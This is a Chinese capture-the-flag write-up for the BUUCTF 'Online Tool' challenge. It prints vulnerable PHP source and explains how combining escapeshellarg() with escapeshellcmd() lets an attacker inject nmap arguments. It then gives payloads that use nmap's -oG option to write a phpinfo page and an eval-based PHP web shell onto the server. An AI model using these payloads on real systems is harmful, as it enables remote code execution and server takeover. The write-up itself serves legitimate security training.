BUUCTF：[BUUCTF 2018]Online Tool

https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

考查点：

• PHP escapeshellarg()+escapeshellcmd() 之殇
• escapeshellarg()详解
• escapeshellcmd()详解
• Nmap -oG参数

利用escapeshellarg()+escapeshellcmd()的两次转义，导致闭合单引号后即可执行任意参数，然后利用Nmap的-oG参数写入shell

?host='<?php phpinfo();?> -oG 1.php '

?host='<?php eval($_POST["cmd"]);?> -oG shell.php '

PS：这里我有个疑问，网上看的题解里面好像都不能清楚的解释为什么?host='<?php eval($_POST["cmd"]);?> -oG shell.php '这里最后的单引号的前面要加个空格，不太明白，有师傅清楚的话，麻烦评论区指点一下，谢谢